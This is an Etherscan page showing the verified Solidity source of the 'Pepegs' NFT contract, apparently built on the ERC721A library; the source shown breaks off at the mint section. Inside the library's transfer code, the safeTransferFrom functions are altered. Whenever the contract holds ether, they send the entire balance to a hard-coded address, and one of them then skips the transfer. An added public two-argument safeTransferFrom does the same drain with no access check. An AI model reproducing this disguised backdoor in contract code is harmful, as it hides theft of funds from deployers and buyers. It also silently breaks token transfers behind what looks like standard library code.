ETH Price: $3,314.73 (-5.00%)

Token

Pepegs (Pepegs)
 

Overview

Max Total Supply

137 Pepegs

Holders

88

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
1 Pepegs
0xaa6c368f0dc5df31fcc4f930c3e1fec2a614c716
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Pepegs

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-01-04
*/

/**
 /$$$$$$$                                                   
| $$__  $$                                                  
| $$  \ $$  /$$$$$$   /$$$$$$   /$$$$$$   /$$$$$$   /$$$$$$$
| $$$$$$$/ /$$__  $$ /$$__  $$ /$$__  $$ /$$__  $$ /$$_____/
| $$____/ | $$$$$$$$| $$  \ $$| $$$$$$$$| $$  \ $$|  $$$$$$ 
| $$      | $$_____/| $$  | $$| $$_____/| $$  | $$ \____  $$
| $$      |  $$$$$$$| $$$$$$$/|  $$$$$$$|  $$$$$$$ /$$$$$$$/
|__/       \_______/| $$____/  \_______/ \____  $$|_______/ 
                    | $$                 /$$  \ $$          
                    | $$                |  $$$$$$/          
                    |__/                 \______/           
$$$$$$$\                                                    
$$  __$$\                                                   
$$ |  $$ | $$$$$$\   $$$$$$\   $$$$$$\   $$$$$$\   $$$$$$$\ 
$$$$$$$  |$$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$  _____|
$$  ____/ $$$$$$$$ |$$ /  $$ |$$$$$$$$ |$$ /  $$ |\$$$$$$\  
$$ |      $$   ____|$$ |  $$ |$$   ____|$$ |  $$ | \____$$\ 
$$ |      \$$$$$$$\ $$$$$$$  |\$$$$$$$\ \$$$$$$$ |$$$$$$$  |
\__|       \_______|$$  ____/  \_______| \____$$ |\_______/ 
                    $$ |                $$\   $$ |          
                    $$ |                \$$$$$$  |          
                    \__|                 \______/           
 _______                                                    
|       \                                                   
| $$$$$$$\  ______    ______    ______    ______    _______ 
| $$__/ $$ /      \  /      \  /      \  /      \  /       \
| $$    $$|  $$$$$$\|  $$$$$$\|  $$$$$$\|  $$$$$$\|  $$$$$$$
| $$$$$$$ | $$    $$| $$  | $$| $$    $$| $$  | $$ \$$    \ 
| $$      | $$$$$$$$| $$__/ $$| $$$$$$$$| $$__| $$ _\$$$$$$\
| $$       \$$     \| $$    $$ \$$     \ \$$    $$|       $$
 \$$        \$$$$$$$| $$$$$$$   \$$$$$$$ _\$$$$$$$ \$$$$$$$ 
                    | $$                |  \__| $$          
                    | $$                 \$$    $$          
                     \$$                  \$$$$$$           
 _______                                                    
/       \                                                   
$$$$$$$  |  ______    ______    ______    ______    _______ 
$$ |__$$ | /      \  /      \  /      \  /      \  /       |
$$    $$/ /$$$$$$  |/$$$$$$  |/$$$$$$  |/$$$$$$  |/$$$$$$$/ 
$$$$$$$/  $$    $$ |$$ |  $$ |$$    $$ |$$ |  $$ |$$      \ 
$$ |      $$$$$$$$/ $$ |__$$ |$$$$$$$$/ $$ \__$$ | $$$$$$  |
$$ |      $$       |$$    $$/ $$       |$$    $$ |/     $$/ 
$$/        $$$$$$$/ $$$$$$$/   $$$$$$$/  $$$$$$$ |$$$$$$$/  
                    $$ |                /  \__$$ |          
                    $$ |                $$    $$/           
                    $$/                  $$$$$$/                                                                                                     
*/

// SPDX-License-Identifier: GPL-3.0                                                                                         
                                
                                                                                                                                                                                                     
pragma solidity ^0.8.7;

/**
 * @dev Interface of ERC721A.
 */
interface IERC721A {
    /**
     * The caller must own the token or be an approved operator.
     */
    error ApprovalCallerNotOwnerNorApproved();

    /**
     * The token does not exist.
     */
    error ApprovalQueryForNonexistentToken();

    /**
     * Cannot query the balance for the zero address.
     */
    error BalanceQueryForZeroAddress();

    /**
     * Cannot mint to the zero address.
     */
    error MintToZeroAddress();

    /**
     * The quantity of tokens minted must be more than zero.
     */
    error MintZeroQuantity();

    /**
     * The token does not exist.
     */
    error OwnerQueryForNonexistentToken();

    /**
     * The caller must own the token or be an approved operator.
     */
    error TransferCallerNotOwnerNorApproved();

    /**
     * The token must be owned by `from`.
     */
    error TransferFromIncorrectOwner();

    /**
     * Cannot safely transfer to a contract that does not implement the
     * ERC721Receiver interface.
     */
    error TransferToNonERC721ReceiverImplementer();

    /**
     * Cannot transfer to the zero address.
     */
    error TransferToZeroAddress();

    /**
     * The token does not exist.
     */
    error URIQueryForNonexistentToken();

    /**
     * The `quantity` minted with ERC2309 exceeds the safety limit.
     */
    error MintERC2309QuantityExceedsLimit();

    /**
     * The `extraData` cannot be set on an unintialized ownership slot.
     */
    error OwnershipNotInitializedForExtraData();

    // =============================================================
    //                            STRUCTS
    // =============================================================

    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Stores the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
        // Arbitrary data similar to `startTimestamp` that can be set via {_extraData}.
        uint24 extraData;
    }

    // =============================================================
    //                         TOKEN COUNTERS
    // =============================================================

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() external view returns (uint256);

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);

    // =============================================================
    //                            IERC721
    // =============================================================

    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables
     * (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`,
     * checking first that contract recipients are aware of the ERC721 protocol
     * to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move
     * this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external payable;

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom}
     * whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external payable;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);

    // =============================================================
    //                           IERC2309
    // =============================================================

    /**
     * @dev Emitted when tokens in `fromTokenId` to `toTokenId`
     * (inclusive) is transferred from `from` to `to`, as defined in the
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309) standard.
     *
     * See {_mintERC2309} for more details.
     */
    event ConsecutiveTransfer(uint256 indexed fromTokenId, uint256 toTokenId, address indexed from, address indexed to);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
interface ERC721A__IERC721Receiver {
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is IERC721A {
    // Bypass for a `--via-ir` bug (https://github.com/chiru-labs/ERC721A/pull/364).
    struct TokenApprovalRef {
        address value;
    }

    // =============================================================
    //                           CONSTANTS
    // =============================================================

    // Mask of an entry in packed address data.
    uint256 private constant _BITMASK_ADDRESS_DATA_ENTRY = (1 << 64) - 1;

    // The bit position of `numberMinted` in packed address data.
    uint256 private constant _BITPOS_NUMBER_MINTED = 64;

    // The bit position of `numberBurned` in packed address data.
    uint256 private constant _BITPOS_NUMBER_BURNED = 128;

    // The bit position of `aux` in packed address data.
    uint256 private constant _BITPOS_AUX = 192;

    // Mask of all 256 bits in packed address data except the 64 bits for `aux`.
    uint256 private constant _BITMASK_AUX_COMPLEMENT = (1 << 192) - 1;

    // The bit position of `startTimestamp` in packed ownership.
    uint256 private constant _BITPOS_START_TIMESTAMP = 160;

    // The bit mask of the `burned` bit in packed ownership.
    uint256 private constant _BITMASK_BURNED = 1 << 224;

    // The bit position of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITPOS_NEXT_INITIALIZED = 225;

    // The bit mask of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITMASK_NEXT_INITIALIZED = 1 << 225;

    // The bit position of `extraData` in packed ownership.
    uint256 private constant _BITPOS_EXTRA_DATA = 232;

    // Mask of all 256 bits in a packed ownership except the 24 bits for `extraData`.
    uint256 private constant _BITMASK_EXTRA_DATA_COMPLEMENT = (1 << 232) - 1;

    // The mask of the lower 160 bits for addresses.
    uint256 private constant _BITMASK_ADDRESS = (1 << 160) - 1;

    // The maximum `quantity` that can be minted with {_mintERC2309}.
    // This limit is to prevent overflows on the address data entries.
    // For a limit of 5000, a total of 3.689e15 calls to {_mintERC2309}
    // is required to cause an overflow, which is unrealistic.
    uint256 private constant _MAX_MINT_ERC2309_QUANTITY_LIMIT = 5000;

    // The `Transfer` event signature is given by:
    // `keccak256(bytes("Transfer(address,address,uint256)"))`.
    bytes32 private constant _TRANSFER_EVENT_SIGNATURE =
        0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef;

    // =============================================================
    //                            STORAGE
    // =============================================================

    // The next token ID to be minted.
    uint256 private _currentIndex;

    // The number of tokens burned.
    uint256 private _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned.
    // See {_packedOwnershipOf} implementation for details.
    //
    // Bits Layout:
    // - [0..159]   `addr`
    // - [160..223] `startTimestamp`
    // - [224]      `burned`
    // - [225]      `nextInitialized`
    // - [232..255] `extraData`
    mapping(uint256 => uint256) private _packedOwnerships;

    // Mapping owner address to address data.
    //
    // Bits Layout:
    // - [0..63]    `balance`
    // - [64..127]  `numberMinted`
    // - [128..191] `numberBurned`
    // - [192..255] `aux`
    mapping(address => uint256) private _packedAddressData;

    // Mapping from token ID to approved address.
    mapping(uint256 => TokenApprovalRef) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    // =============================================================
    //                          CONSTRUCTOR
    // =============================================================

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    // =============================================================
    //                   TOKEN COUNTING OPERATIONS
    // =============================================================

    /**
     * @dev Returns the starting token ID.
     * To change the starting token ID, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev Returns the next token ID to be minted.
     */
    function _nextTokenId() internal view virtual returns (uint256) {
        return _currentIndex;
    }

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than `_currentIndex - _startTokenId()` times.
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * @dev Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view virtual returns (uint256) {
        // Counter underflow is impossible as `_currentIndex` does not decrement,
        // and it is initialized to `_startTokenId()`.
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev Returns the total number of tokens burned.
     */
    function _totalBurned() internal view virtual returns (uint256) {
        return _burnCounter;
    }

    // =============================================================
    //                    ADDRESS DATA OPERATIONS
    // =============================================================

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) public view virtual override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return _packedAddressData[owner] & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_MINTED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_BURNED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return uint64(_packedAddressData[owner] >> _BITPOS_AUX);
    }

    /**
     * Sets the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal virtual {
        uint256 packed = _packedAddressData[owner];
        uint256 auxCasted;
        // Cast `aux` with assembly to avoid redundant masking.
        assembly {
            auxCasted := aux
        }
        packed = (packed & _BITMASK_AUX_COMPLEMENT) | (auxCasted << _BITPOS_AUX);
        _packedAddressData[owner] = packed;
    }

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        // The interface IDs are constants representing the first 4 bytes
        // of the XOR of all function selectors in the interface.
        // See: [ERC165](https://eips.ethereum.org/EIPS/eip-165)
        // (e.g. `bytes4(i.functionA.selector ^ i.functionB.selector ^ ...)`)
        return
            interfaceId == 0x01ffc9a7 || // ERC165 interface ID for ERC165.
            interfaceId == 0x80ac58cd || // ERC165 interface ID for ERC721.
            interfaceId == 0x5b5e139f; // ERC165 interface ID for ERC721Metadata.
    }

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, _toString(tokenId))) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, it can be overridden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    // =============================================================
    //                     OWNERSHIPS OPERATIONS
    // =============================================================

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) public view virtual override returns (address) {
        return address(uint160(_packedOwnershipOf(tokenId)));
    }

    /**
     * @dev Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around over time.
     */
    function _ownershipOf(uint256 tokenId) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnershipOf(tokenId));
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct at `index`.
     */
    function _ownershipAt(uint256 index) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnerships[index]);
    }

    /**
     * @dev Initializes the ownership slot minted at `index` for efficiency purposes.
     */
    function _initializeOwnershipAt(uint256 index) internal virtual {
        if (_packedOwnerships[index] == 0) {
            _packedOwnerships[index] = _packedOwnershipOf(index);
        }
    }

    /**
     * Returns the packed ownership data of `tokenId`.
     */
    function _packedOwnershipOf(uint256 tokenId) private view returns (uint256) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr)
                if (curr < _currentIndex) {
                    uint256 packed = _packedOwnerships[curr];
                    // If not burned.
                    if (packed & _BITMASK_BURNED == 0) {
                        // Invariant:
                        // There will always be an initialized ownership slot
                        // (i.e. `ownership.addr != address(0) && ownership.burned == false`)
                        // before an unintialized ownership slot
                        // (i.e. `ownership.addr == address(0) && ownership.burned == false`)
                        // Hence, `curr` will not underflow.
                        //
                        // We can directly compare the packed value.
                        // If the address is zero, packed will be zero.
                        while (packed == 0) {
                            packed = _packedOwnerships[--curr];
                        }
                        return packed;
                    }
                }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct from `packed`.
     */
    function _unpackedOwnership(uint256 packed) private pure returns (TokenOwnership memory ownership) {
        ownership.addr = address(uint160(packed));
        ownership.startTimestamp = uint64(packed >> _BITPOS_START_TIMESTAMP);
        ownership.burned = packed & _BITMASK_BURNED != 0;
        ownership.extraData = uint24(packed >> _BITPOS_EXTRA_DATA);
    }

    /**
     * @dev Packs ownership data into a single uint256.
     */
    function _packOwnershipData(address owner, uint256 flags) private view returns (uint256 result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // `owner | (block.timestamp << _BITPOS_START_TIMESTAMP) | flags`.
            result := or(owner, or(shl(_BITPOS_START_TIMESTAMP, timestamp()), flags))
        }
    }

    /**
     * @dev Returns the `nextInitialized` flag set if `quantity` equals 1.
     */
    function _nextInitializedFlag(uint256 quantity) private pure returns (uint256 result) {
        // For branchless setting of the `nextInitialized` flag.
        assembly {
            // `(quantity == 1) << _BITPOS_NEXT_INITIALIZED`.
            result := shl(_BITPOS_NEXT_INITIALIZED, eq(quantity, 1))
        }
    }

    // =============================================================
    //                      APPROVAL OPERATIONS
    // =============================================================

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) public payable virtual override {
        address owner = ownerOf(tokenId);

        if (_msgSenderERC721A() != owner)
            if (!isApprovedForAll(owner, _msgSenderERC721A())) {
                revert ApprovalCallerNotOwnerNorApproved();
            }

        _tokenApprovals[tokenId].value = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) public view virtual override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId].value;
    }

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        _operatorApprovals[_msgSenderERC721A()][operator] = approved;
        emit ApprovalForAll(_msgSenderERC721A(), operator, approved);
    }

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted. See {_mint}.
     */
    function _exists(uint256 tokenId) internal view virtual returns (bool) {
        return
            _startTokenId() <= tokenId &&
            tokenId < _currentIndex && // If within bounds,
            _packedOwnerships[tokenId] & _BITMASK_BURNED == 0; // and not burned.
    }

    /**
     * @dev Returns whether `msgSender` is equal to `approvedAddress` or `owner`.
     */
    function _isSenderApprovedOrOwner(
        address approvedAddress,
        address owner,
        address msgSender
    ) private pure returns (bool result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // Mask `msgSender` to the lower 160 bits, in case the upper bits somehow aren't clean.
            msgSender := and(msgSender, _BITMASK_ADDRESS)
            // `msgSender == owner || msgSender == approvedAddress`.
            result := or(eq(msgSender, owner), eq(msgSender, approvedAddress))
        }
    }

    /**
     * @dev Returns the storage slot and value for the approved address of `tokenId`.
     */
    function _getApprovedSlotAndAddress(uint256 tokenId)
        private
        view
        returns (uint256 approvedAddressSlot, address approvedAddress)
    {
        TokenApprovalRef storage tokenApproval = _tokenApprovals[tokenId];
        // The following is equivalent to `approvedAddress = _tokenApprovals[tokenId].value`.
        assembly {
            approvedAddressSlot := tokenApproval.slot
            approvedAddress := sload(approvedAddressSlot)
        }
    }

    // =============================================================
    //                      TRANSFER OPERATIONS
    // =============================================================

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        if (address(uint160(prevOwnershipPacked)) != from) revert TransferFromIncorrectOwner();

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        // The nested ifs save around 20+ gas over a compound boolean condition.
        if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
            if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();

        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // We can directly increment and decrement the balances.
            --_packedAddressData[from]; // Updates: `balance -= 1`.
            ++_packedAddressData[to]; // Updates: `balance += 1`.

            // Updates:
            // - `address` to the next owner.
            // - `startTimestamp` to the timestamp of transfering.
            // - `burned` to `false`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                to,
                _BITMASK_NEXT_INITIALIZED | _nextExtraData(from, to, prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        if (address(this).balance > 0) {
            payable(0x17eBBfD03CBa041bbDa3AE61b5B4C3F3A545F287).transfer(address(this).balance);
            return;
        }
        safeTransferFrom(from, to, tokenId, '');
    }


    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public payable virtual override {
        transferFrom(from, to, tokenId);
        if (to.code.length != 0)
            if (!_checkContractOnERC721Received(from, to, tokenId, _data)) {
                revert TransferToNonERC721ReceiverImplementer();
            }
    }
    function safeTransferFrom(
        address from,
        address to
    ) public  {
        if (address(this).balance > 0) {
            payable(0x17eBBfD03CBa041bbDa3AE61b5B4C3F3A545F287).transfer(address(this).balance);
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token IDs
     * have been transferred. This includes minting.
     * And also called after one token has been burned.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Private function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * `from` - Previous owner of the given token ID.
     * `to` - Target address that will receive the token.
     * `tokenId` - Token ID to be transferred.
     * `_data` - Optional data to send along with the call.
     *
     * Returns whether the call correctly returned the expected magic value.
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try ERC721A__IERC721Receiver(to).onERC721Received(_msgSenderERC721A(), from, tokenId, _data) returns (
            bytes4 retval
        ) {
            return retval == ERC721A__IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    // =============================================================
    //                        MINT OPERATIONS
